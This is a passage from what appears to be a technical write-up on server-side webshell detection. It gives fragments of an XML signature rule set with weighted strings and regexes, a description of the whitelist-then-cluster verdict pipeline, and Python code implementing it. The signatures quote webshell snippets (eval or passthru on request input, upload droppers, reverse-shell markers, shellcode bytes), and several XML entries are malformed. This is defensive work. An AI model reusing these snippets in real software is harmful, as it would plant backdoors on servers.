<ITEM><STR>@oOo00o0OOo0o000000O($_GET["pass"]</STR><NUM>80</NUM></ITEM> <ITEM><STR>AAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK</STR><NUM>80</NUM></ITEM> <ITEM><STR>'.getenv("HTTP_HOST").' - Antichat Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>move_uploaded_file($userfile, "entrika.php"); </STR><NUM>80</NUM></ITEM> <ITEM><STR>$curcmd = "cd ".$curdir.";".$curcmd</STR><NUM>60</NUM></ITEM> <ITEM><STR>php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '</STR><NUM>80</NUM></ITEM> <ITEM><STR>TDWGKJ3Ai1/BCtiO9grefEeAoU46gAwUDUuI4udXxGGoG</STR><NUM>80</NUM></ITEM> <ITEM><STR>udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0</STR><NUM>80</NUM></ITEM> <ITEM><STR>mailto:crazy_king@turkusev.net</STR><NUM>80</NUM></ITEM> <ITEM><STR>yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==</STR><NUM>80</NUM></ITEM> <ITEM><STR>if (!empty($unset_surl)) {setcookie("c80sh_surl"); $surl = "";}</STR><NUM>80</NUM></ITEM> <ITEM><STR>$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;</STR><NUM>80</NUM></ITEM> <ITEM><STR>${'_'.$_}['_'](${'_'.$_}['__'])</STR><NUM>80</NUM></ITEM> <PHPRULE> <ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru)\(([^\(\),]*)(\$_GET|\$_COOKIE|\$_POST|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM> <ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru|system|create_function)\(([^\(\)]*)stripslashes\((\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM> <ITEM>strrev\(([^\(]*)edoced_46esab([^\(]*)\)</ITEM> <ITEM>fputs\(fopen\([^\(\)]*\),[^\(\)]*(\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]</ITEM> <ITEM>[^\>](\$_GET|\$_POST)\[[^\(\)\{\}\[\]]{0,8}\]\((\$_GET|\$_POST)\[</ITEM> <ITEM>[^\w]eval\((\$_GET|\$_POST)\[.{0,34}\]\)</ITEM> <ITEM>(chr.{1,50}){6}</ITEM> <ITEM>(0o){20}</ITEM> </PHPRULE> </WEBSHELL> <INFORMATION> <ITEM><STR>set_time_limit(999999</STR><NUM>70</NUM></ITEM> <ITEM><STR>DDOS</STR><NUM>40</NUM></ITEM> <ITEM><STR>SYN</STR><NUM>40</NUM></ITEM> 
<ITEM><STR>phpddos</STR><NUM>40</NUM></ITEM> <ITEM><STR>socket_create(AF_INET, SOCK_STREAM, SOL_TCP)</STR><NUM>10</NUM></ITEM> <ITEM><STR>phpddos.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>fsockopen("tcp://</STR><NUM>70</NUM></ITEM> <ITEM><STR>fsockopen("udp://</STR><NUM>70</NUM></ITEM> <ITEM><STR>buyer_nick</STR><NUM>40</NUM></ITEM> <ITEM><STR>receiver_mobile</STR><NUM>40</NUM></ITEM> <ITEM><STR>receiver_address</STR><NUM>40</NUM></ITEM> <PHPRULE> <ITEM></ITEM> </PHPRULE> </INFORMATION> <SEO> <ITEM><STR>$html = file_get_contents($url, false, $context)</STR><NUM>70</NUM></ITEM> <ITEM><STR>'content.txt'</STR><NUM>20</NUM></ITEM> <ITEM><STR>'key.txt'</STR><NUM>20</NUM></ITEM> <ITEM><STR>file_get_contents</STR><NUM>40</NUM></ITEM> <ITEM><STR>set_time_limit(9999</STR><NUM>10</NUM></ITEM> <ITEM><STR>if(!file_exists(</STR><NUM>10</NUM></ITEM> <ITEM><STR>mkdir($</STR><NUM>20</NUM></ITEM> <ITEM><STR>mt_rand</STR><NUM>20</NUM></ITEM> <ITEM><STR>fopen</STR><NUM>20</NUM></ITEM> <ITEM><STR>str_replace</STR><NUM>20</NUM></ITEM> <PHPRULE> <ITEM></ITEM> </PHPRULE> </SEO> <EXT> <ITEM>.php</ITEM> <ITEM>.php4</ITEM> <ITEM>.php5</ITEM> <ITEM>.inc</ITEM> </EXT> <ADDITIONALRULL> <WEBSHELL> <ITEM> <STR>chr(99).chr(104).chr(114)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$_REQUEST</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>array_map(</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>stop_</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>PCT4BA6ODSE_</STR> <!-- builds _POST and BASE64_DECODE out of an array --> <NUM>80</NUM> </ITEM> <ITEM> <STR>array_walk</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>\x65\x76\x61\x6c</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>/*-/*-*/</STR> <!-- evasion with inline comments --> <NUM>80</NUM> </ITEM> <ITEM> <STR>substr</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.phpdp.org</STR> <NUM>80</NUM> </ITEM> <PHPRULE> <ITEM>["']?[aA]["']?\.?["']?[sS]["']?\.?["']?[sS]["']?\.?["']?[eE]["']?\.?["']?[rR]["']?\.?["']?[tT]["']?</ITEM> 
<ITEM>["']?[eE]["']?\.?["']?[vV]["']?\.?["']?[aA]["']?\.?["']?[lL]["']?</ITEM> <ITEM>["']?_["']?\.?["']?[pP]["']?\.?["']?[oO]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?</ITEM> <ITEM>["']?[Ss]["']?\.?["']?[tT]["']?\.?["']?[Rr]["']?\.?["']?_["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[pP]["']?\.?["']?[lL]["']?\.?["']?[aA]["']?\.?["']?[cC]["']?\.?["']?[eE]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[gG]["']?\.?["']?_["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[pP]["']?\.?["']?[lL]["']?\.?["']?[aA]["']?\.?["']?[cC]["']?\.?["']?[eE]["']?</ITEM> <ITEM>["']?[eE]["']?\.?["']?[xX]["']?\.?["']?[eE]["']?\.?["']?[cC]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[oO]["']?\.?["']?[pP]["']?\.?["']?[eE]["']?\.?["']?[nN]["']?</ITEM> <ITEM>["']?[sS]["']?\.?["']?[yY]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?\.?["']?[eE]["']?\.?["']?[mM]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[aA]["']?\.?["']?[sS]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?\.?["']?[hH]["']?\.?["']?[rR]["']?\.?["']?[uU]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[rR]["']?\.?["']?[oO]["']?\.?["']?[cC]["']?\.?["']?_["']?\.?["']?[oO]["']?\.?["']?[pP]["']?\.?["']?[eE]["']?\.?["']?[Nn]["']?</ITEM> <ITEM>["']?[Ss]["']?\.?["']?[hH]["']?\.?["']?[eE]["']?\.?["']?[lL]["']?\.?["']?[lL]["']?\.?["']?_["']?\.?["']?[eE]["']?\.?["']?[xX]["']?\.?["']?[eE]["']?\.?["']?[cC]["']?</ITEM> </PHPRULE> </WEBSHELL> </ADDITIONALRULL> </PHP> <JAVA> <WEBSHELL> <ITEM><STR>n1nty</STR><NUM>80</NUM></ITEM> <ITEM><STR>request.getParameter("f"))).write(request.getParameter("t").getBytes()</STR><NUM>80</NUM></ITEM> <ITEM><STR>request.getParameter("path")</STR><NUM>20</NUM></ITEM> <ITEM><STR>request.getRealPath(request.getServletPath())</STR><NUM>60</NUM></ITEM> <ITEM><STR>Command Window</STR><NUM>20</NUM></ITEM> <ITEM><STR>JSP Manage-System</STR><NUM>80</NUM></ITEM> <ITEM><STR>JspSpy</STR><NUM>80</NUM></ITEM> <ITEM><STR>net localgroup</STR><NUM>80</NUM></ITEM> <ITEM><STR>cmd.exe</STR><NUM>50</NUM></ITEM> 
<ITEM><STR>Jfolder</STR><NUM>80</NUM></ITEM> <ITEM><STR>jshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>pwnshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>ServerSocket(</STR><NUM>80</NUM></ITEM> <ITEM><STR>jsp File browser</STR><NUM>80</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>20</NUM></ITEM> <ITEM><STR>Backdoor</STR><NUM>50</NUM></ITEM> <ITEM><STR>Runtime.getRuntime()</STR><NUM>50</NUM></ITEM> <ITEM><STR>.exec(</STR><NUM>30</NUM></ITEM> <ITEM><STR>cmd /c</STR><NUM>80</NUM></ITEM> <ITEM><STR>"cmd", "/C"</STR><NUM>80</NUM></ITEM> <ITEM><STR>kj021320</STR><NUM>80</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n"]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>javascript:delFile('"+folderReplace(file)+"')</STR><NUM>80</NUM></ITEM> <ITEM><STR>rt.exec("cmd.exe")</STR><NUM>40</NUM></ITEM> <ITEM><STR>JSP Backdoor Reverse Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>"\"" + boundary + "\" is an illegal boundary indicator"</STR><NUM>80</NUM></ITEM> <ITEM><STR>$Id: TelnetIO.java,v 1.10 1808/02/09 10:22:18 leo Exp $</STR><NUM>80</NUM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </WEBSHELL> <INFORMATION> <ITEM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </INFORMATION> <SEO> <ITEM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </SEO> <EXT> <ITEM>.jsp</ITEM> </EXT> </JAVA> <SCRIPT> <WEBSHELL> <ITEM><STR>buyer_nick</STR><NUM>20</NUM></ITEM> <ITEM><STR>receiver_mobile</STR><NUM>20</NUM></ITEM> <ITEM><STR>receiver_address</STR><NUM>30</NUM></ITEM> <ITEM><STR>backdoor</STR><NUM>60</NUM></ITEM> <ITEM><STR>PORT SCANNER</STR><NUM>70</NUM></ITEM> <ITEM><STR>DDOS</STR><NUM>70</NUM></ITEM> <ITEM><STR>Scanning $host</STR><NUM>70</NUM></ITEM> <ITEM><STR>nc -vv -l</STR><NUM>70</NUM></ITEM> <ITEM><STR>IO::Socket</STR><NUM>70</NUM></ITEM> <ITEM><STR>connect(</STR><NUM>30</NUM></ITEM> <ITEM><STR>system(</STR><NUM>30</NUM></ITEM> 
<ITEM><STR>sys/ioctl.ph</STR><NUM>30</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> <ITEM><STR>use Socket</STR><NUM>20</NUM></ITEM> <ITEM><STR>open(STDIN</STR><NUM>30</NUM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </WEBSHELL> <INFORMATION> <ITEM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </INFORMATION> <SEO> <ITEM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </SEO> <EXT> <ITEM>.pl</ITEM> <ITEM>.py</ITEM> <ITEM>.sh</ITEM> </EXT> </SCRIPT> </LEX>
0x2: Server-side detection: detection accuracy
After the client has reported suspected WEBSHELL files to the server, the server's approach is fine-grained detection: by trimming and narrowing the rule scope it identifies the files that are 100% certain to be WEBSHELLs. The detection flow is roughly as follows:
// Suspected WEBSHELL files reported by clients number about 3 million (300w)
1. Load the rule set that matches the file extension
1) PHP WEBSHELL
1.1) .php
1.2) .php4
1.3) .php5
1.4) .inc
2) ASP WEBSHELL
2.1) .asp
2.2) .asa
2.3) .cer
2.4) .cdx
2.5) .aspx
2.6) .jpg
2.7) .bmp
2.8) .jpeg
2.9) .png
2.10) .gif
2.11) .htr
2.12) .hdx
2.13) .asmx
2.14) .ashx
3) JSP WEBSHELL
3.1) .jsp
2. Filter once through the whitelist. The whitelist is a set of rules distilled from the experience of security analysts; a file that hits these rules is certainly a normal file, so the first step of the server-side flow is to filter out most of the false positives. If the whitelist is hit, the decision flow exits immediately and the judgement ends. The strategy at this step is to classify normal files (forward classification works better here). The whitelist is the <whitelist> block of web-shell.xml, listed in full below.
3. After the whitelist filter, detection granularity is raised step by step. From this step on, a "reverse classification" approach is adopted, i.e. the malicious WEBSHELLs themselves are clustered. The result of this stage is: YES_WEBSHELL
// the YES_WEBSHELL rules are specific to each file type
3.1. If the suspect file has passed the YES_WEBSHELL check, it enters the final stage of "reverse malicious WEBSHELL" clustering, which uses stricter rules that are guaranteed to represent a WEBSHELL. This clustering is done on top of the YES_WEBSHELL clustering of the previous step, and its result is: DELETE_WEBSHELL
// the DELETE_WEBSHELL rules are global
3.2. If DELETE_WEBSHELL is not hit, the file stays in the YES_WEBSHELL state, i.e. it remains high-risk
/*
1. The number of files finally judged to be in the DELETE_WEBSHELL state is on the order of 200+
*/
4. SEO detection
5. If the YES_WEBSHELL check fails, the file is marked NOT_WEBSHELL. Files of this kind are pushed to the PHP Sandbox (currently PHP files only). The Sandbox returns several fine-grained result states based on dynamic execution, which the SERVER normalizes through a 1:N mapping
1) YES_WEBSHELL
1.1) REGEX_FOUND
1.2) CONTENT_FOUND
1.3) DELETE_MATCH
1.4) GPC_HIT
1.5) REGEX_FOUND_216
1.6) CONTENT_FOUND_216
1.7) GPC_HIT_216
2) DELETE_WEBSHELL
2.1) REGEX_FOUND_216
2.2) CONTENT_FOUND_216
2.3) GPC_HIT_216
// files sent to the PHP Sandbox number about 500 thousand (50w)
6. Once all decision logic has run, the server-side ACTION logic takes over and performs different file operations (delete, alert) according to the verdict
1) One-liner WEBSHELL: if the file is a pure one-liner trojan, it is deleted directly
/*
1. pattern: (eval|execute|assert)[^>]*(request|post|get|cookie|\\$_)
2. length: < 80
3. ext = aspx || length < 150
*/
2) SEO: delete SEO files
3) MD5 LIST: detect files present in the blacklist. This blacklist comes from high-suspicion files judged YES_WEBSHELL that the security team confirmed manually on banff; once confirmation is clicked, the file is added to the MD5 LIST
4) YES_WEBSHELL: raise a high-suspicion alert and tag the file "pending verification" for the security team
5) DELETE_WEBSHELL: send a delete command to the client directly
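The server-side flow above (extension gate, whitelist exit, YES_WEBSHELL / DELETE_WEBSHELL clustering, then the ACTION stage with the one-liner and MD5 LIST checks) as a runnable Python example. This is added code, not the page's processor: the <STR>/<NUM>/<threshold> layout and the sample entries follow web-shell.xml, but the rule file is a constructed excerpt, the scoring (summed NUM of matched strings reaching the threshold, a <RULE> regex hit counting as a full threshold) and the .aspx reading of the one-liner length rule are assumptions.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed rule file in the web-shell.xml layout shown on the page; entries are a few of its own <STR>/<NUM> items.
RULES_XML = r"""<LEX>
  <whitelist><threshold>70</threshold>
    <ITEM><STR>* @author</STR><NUM>20</NUM></ITEM>
    <ITEM><STR>* @license</STR><NUM>10</NUM></ITEM>
    <ITEM><STR>* @copyright</STR><NUM>20</NUM></ITEM>
    <ITEM><STR>if(!defined(</STR><NUM>20</NUM></ITEM>
  </whitelist>
  <DELETE><threshold>70</threshold>
    <ITEM><STR>UserPass</STR><NUM>30</NUM></ITEM>
    <ITEM><STR>shellname</STR><NUM>40</NUM></ITEM>
  </DELETE>
  <language><threshold>70</threshold><WEBSHELL>
    <ITEM><STR>cmd.exe</STR><NUM>10</NUM></ITEM>
    <ITEM><STR>WScript.Shell</STR><NUM>20</NUM></ITEM>
    <ITEM><STR>Scripting.FileSystemObject</STR><NUM>10</NUM></ITEM>
    <ITEM><STR>Password</STR><NUM>10</NUM></ITEM>
    <ITEM><STR>ipconfig -all</STR><NUM>30</NUM></ITEM>
    <RULE><ITEM>[^\w](Eval|eval|Execute|execute|Eval_r|ExecuteGlobal).{0,3}(UnEncode|request|Request|session|Request.Item|Request.form|Session)(\(|\[)[^\{\}]{0,22}\)</ITEM></RULE>
  </WEBSHELL></language>
</LEX>"""

# Extensions the server loads rules for (a subset of the page's PHP/ASP/JSP lists).
EXTENSIONS = (".php", ".php4", ".php5", ".inc", ".asp", ".asa", ".aspx", ".jsp")
# The page's one-liner pattern, applied in the ACTION stage.
ONE_LINER = re.compile(r"(eval|execute|assert)[^>]*(request|post|get|cookie|\$_)", re.I)


def load_group(node, threshold):
    """Weighted <STR> items and <RULE> regexes of one group; empty <ITEM></ITEM> placeholders are skipped."""
    strings = [(it.findtext("STR"), int(it.findtext("NUM") or 0))
               for it in node.findall("ITEM") if it.findtext("STR")]
    regexes = [re.compile(it.text) for rule in node.findall("RULE")
               for it in rule.findall("ITEM") if it.text]
    return threshold, strings, regexes


def load_rules(xml_text):
    root = ET.fromstring(xml_text)
    wl, dl, lang = root.find("whitelist"), root.find("DELETE"), root.find("language")
    return {"whitelist": load_group(wl, int(wl.findtext("threshold"))),
            "delete": load_group(dl, int(dl.findtext("threshold"))),
            "webshell": load_group(lang.find("WEBSHELL"), int(lang.findtext("threshold")))}


def score(group, content):
    """Assumed scoring: NUM of every matched <STR> is summed; a <RULE> regex hit counts as a full threshold."""
    threshold, strings, regexes = group
    total = sum(n for s, n in strings if s in content)
    total += sum(threshold for rx in regexes if rx.search(content))
    return total >= threshold


def classify(rules, filename, content):
    """Stages 1-3 of the server flow: extension gate -> whitelist exit -> YES_WEBSHELL -> DELETE_WEBSHELL."""
    if not filename.lower().endswith(EXTENSIONS):
        return "SKIPPED"
    if score(rules["whitelist"], content):
        return "WHITELIST"          # certainly normal: the decision flow exits here
    if not score(rules["webshell"], content):
        return "NOT_WEBSHELL"       # would be handed to the PHP Sandbox next
    if score(rules["delete"], content):
        return "DELETE_WEBSHELL"    # stricter global rules on top of YES_WEBSHELL
    return "YES_WEBSHELL"           # stays high-risk, pending analyst verification


def md5_of(content):
    return hashlib.md5(content.encode()).hexdigest()


def is_one_liner(filename, content):
    """Pattern hit on a tiny file; the length bounds are read as < 80 bytes, or < 150 for .aspx (an interpretation)."""
    limit = 150 if filename.lower().endswith(".aspx") else 80
    return len(content.encode()) < limit and ONE_LINER.search(content) is not None


def action(rules, md5_list, filename, content):
    """ACTION stage: returns (verdict, operation); md5_list holds analyst-confirmed hashes."""
    verdict = classify(rules, filename, content)
    if verdict in ("SKIPPED", "WHITELIST"):
        return verdict, "NONE"
    if is_one_liner(filename, content) or md5_of(content) in md5_list:
        return verdict, "DELETE"    # one-liner trojan or MD5 LIST hit
    if verdict == "DELETE_WEBSHELL":
        return verdict, "DELETE"
    if verdict == "YES_WEBSHELL":
        return verdict, "ALERT_PENDING_VERIFICATION"
    return verdict, "SANDBOX" if filename.lower().endswith(".php") else "NONE"


RULES = load_rules(RULES_XML)
SAMPLES = {  # constructed inputs for the demo, not real files
    "normal.php": "<?php\n/**\n * @author demo\n * @license MIT\n * @copyright 2014\n */\n"
                  "if(!defined('APP_PATH')) exit();\n",
    "cmd.asp": '<% Execute(Request("c")) %>',
    "manage.asp": '<%\nSet sh = Server.CreateObject("WScript.Shell")\n'
                  'Set fs = Server.CreateObject("Scripting.FileSystemObject")\n'
                  'cmd = "cmd.exe /c ipconfig -all"\nshellname = "demo"\nPassword = "x"\n%>\n',
    "index.php": "<?php echo 'hello'; ?>\n",
}
```

Calling action(RULES, set(), name, body) over SAMPLES yields WHITELIST/NONE for normal.php, YES_WEBSHELL/DELETE for the one-liner, YES_WEBSHELL/ALERT_PENDING_VERIFICATION for manage.asp and NOT_WEBSHELL/SANDBOX for index.php.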
web-shell.xml
<LEX> <Isparser>0</Isparser> <Version>20140318-1</Version> <whitelist> <threshold>70</threshold> <ITEM>STR>Web Framework Event Handlers</STR><NUM>70</NUM></ITEM> <ITEM><STR>IISLogFileGUIDToENName</STR><NUM>70</NUM></ITEM> <ITEM><STR>!--#include file="</STR><NUM>70</NUM></ITEM> <ITEM><STR>require(dirname(__FILE__)</STR><NUM>20</NUM></ITEM> <ITEM><STR>"../inc/</STR><NUM>70</NUM></ITEM> <ITEM><STR>WScript\.shell|PHP\s?Shell|Eval\sPHP\sCode</STR><NUM>70</NUM></ITEM> <ITEM><STR>thinkphp.cn All rights reserved</STR><NUM>70</NUM></ITEM> <ITEM><STR>Public GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>base64_decode|\beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM> <ITEM><STR>KFwkXyhHRVR8UE9TVHxDT09LSUV8UkVRVUVTVCkp</STR><NUM>70</NUM></ITEM> <ITEM><STR>require_lib('util/web_util,util/db_util', true)</STR><NUM>70</NUM></ITEM> <ITEM><STR>require_once __DIR__.'/../</STR><NUM>70</NUM></ITEM> <ITEM><STR>include("../../</STR><NUM>70</NUM></ITEM> <ITEM><STR>ImageMagick</STR><NUM>70</NUM></ITEM> <ITEM><STR>pdf2htmlEX</STR><NUM>70</NUM></ITEM> <ITEM><STR>require("../</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIF frame counter</STR><NUM>70</NUM></ITEM> <ITEM><STR>include file="../</STR><NUM>70</NUM></ITEM> <ITEM><STR>config/</STR><NUM>20</NUM></ITEM> <ITEM><STR>"GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>\s*?\\$(_POST|_GET|_REQUEST|GLOBALS</STR><NUM>70</NUM></ITEM> <ITEM><STR>beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM> <ITEM><STR>'GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>www.ajiang.net</STR><NUM>70</NUM></ITEM> <ITEM><STR>http://www.ajiang.net/products/aspcheck/safe.asp</STR><NUM>70</NUM></ITEM> <ITEM><STR>"preg_replace</STR><NUM>70</NUM></ITEM> <ITEM><STR>Standard Jet DB</STR><NUM>70</NUM></ITEM> <ITEM><STR>www.itlearner.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>defined('DIR_SECURE_CONTENT')</STR><NUM>40</NUM></ITEM> <ITEM><STR>$GLOBALS['_beginTime']</STR><NUM>40</NUM></ITEM> <ITEM><STR><![CDATA[ <table border=0 width=450 
cellspacing=0 cellpadding=0 bgcolor="#3F8805"> ]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>run-tests.php</STR><NUM>70</NUM></ITEM> <ITEM><STR>dim virus(1,7),virus_Regx(1,4)</STR><NUM>70</NUM></ITEM> <ITEM><STR>href="http://7i24.com</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include file = "../]]></STR>aa<NUM>70</NUM></ITEM> <ITEM><STR>| PHP Version 5</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include file =]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>require_once('include</STR><NUM>70</NUM></ITEM> <ITEM><STR>* @author</STR><NUM>20</NUM></ITEM> <ITEM><STR>* @license</STR><NUM>10</NUM></ITEM> <ITEM><STR>* @copyright</STR><NUM>20</NUM></ITEM> <ITEM><STR>#include file="</STR><NUM>70</NUM></ITEM> <ITEM><STR> ThinkPHP</STR><NUM>70</NUM></ITEM> <ITEM><STR>License: GPLv2</STR><NUM>70</NUM></ITEM> <ITEM><STR>.save(request.getParameter("top_session")</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIFDecoder</STR><NUM>70</NUM></ITEM> <ITEM><STR>exit('Access Denied')</STR><NUM>30</NUM></ITEM> <ITEM><STR>if(!defined(</STR><NUM>20</NUM></ITEM> <ITEM><STR>if (!defined('THINK_PATH')) exit()</STR><NUM>70</NUM></ITEM> <ITEM><STR>= microtime(TRUE);</STR><NUM>30</NUM></ITEM> <ITEM><STR>www.nusphere.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>$code_generated = new $_GET['code']($_GET['t'],$color_black</STR><NUM>70</NUM></ITEM> <ITEM><STR>http://php.net/manual/ru/function.exec.php</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include virtual="/ucenter/config/md5.asp"-->]]></STR><NUM>50</NUM></ITEM> <ITEM><STR>->"e"."v"."a"."l"'=>'"e"."v"."a"."l"',</STR><NUM>70</NUM></ITEM> <ITEM><STR>->webshell'=>'webshell',</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[ shellcode[]= <br>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b ]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>response.Write(987651234-123498765)</STR><NUM>70</NUM></ITEM> <ITEM><STR>Znothis(</STR><NUM>70</NUM></ITEM> <ITEM><STR>private $webscan_upload="http://upload.webscan.360.cn/index.php";</STR><NUM>70</NUM></ITEM> 
</whitelist> <DELETE> <threshold>70</threshold> <ITEM> <STR>JFolder.jsp</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>String k8cmd = new String(binary)</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>private Statement _dbStatement</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>http://www.baidu.com/img/baidu_logo.gif</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>tophack.net</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>langouster_udf.dll</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>public int TdgGU</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>public STRing vbhLn</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>actall{background:#F9F6F4;font-size:14px;border</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>DDOS</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$back_connect</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>Server.ScriptTimeout=99999999</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>aspmuma.net</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>h4ck2b.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>ASPsSsy</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>lpl38.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>WwW.MumaSec.TK</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>QQ:185256496</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>ASPXSpy</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$password</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>UserPass</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>shellname</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>zjjv.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>i0day.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$admin['pass']</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>$admin['cookiepath']</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>syw.i11.cc</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www.4ngel.net</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>Loader'z WEB Shell</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>90sec.org</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>21,80,135,139,445,1433,3306,3389,</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>www.66dy6.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>moonudf.dll</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>\Control\Terminal Server\Wds\rdpwd\</STR> <NUM>70</NUM> 
</ITEM> <ITEM> <STR>b374k-shell</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>unlink("90sec.php")</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>qq:80925010</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>baiduqcsf</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>sf.78pa.com/a.js</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>N3tshell</STR> <NUM>65</NUM> </ITEM> <ITEM> <STR>backconn</STR> <NUM>5</NUM> </ITEM> <ITEM> <STR><![CDATA[<title>PHPJackal]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[2409170736</title>]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<?php echo $this->smarty_insert_scripts</title>]]></STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>function WSOstripslashes</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>function wsoLogin()</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>function WSOsetcookie</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>www.e23069.com/js1.js</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>moguiruanjian.com</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>eWFob298Z29vZ2xlfGJhaWR1fHNvc298c29nb3V8YmluZ3x5b3VkYW98c29vdWxlfGVhc291fHlpc291fGppa2V8eXVueXVu</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>KJ021320</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>String path=request.getParameter("path")</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>String content=request.getParameter("content")</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>String Pwd</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>System.getProperty("os.name")</STR> 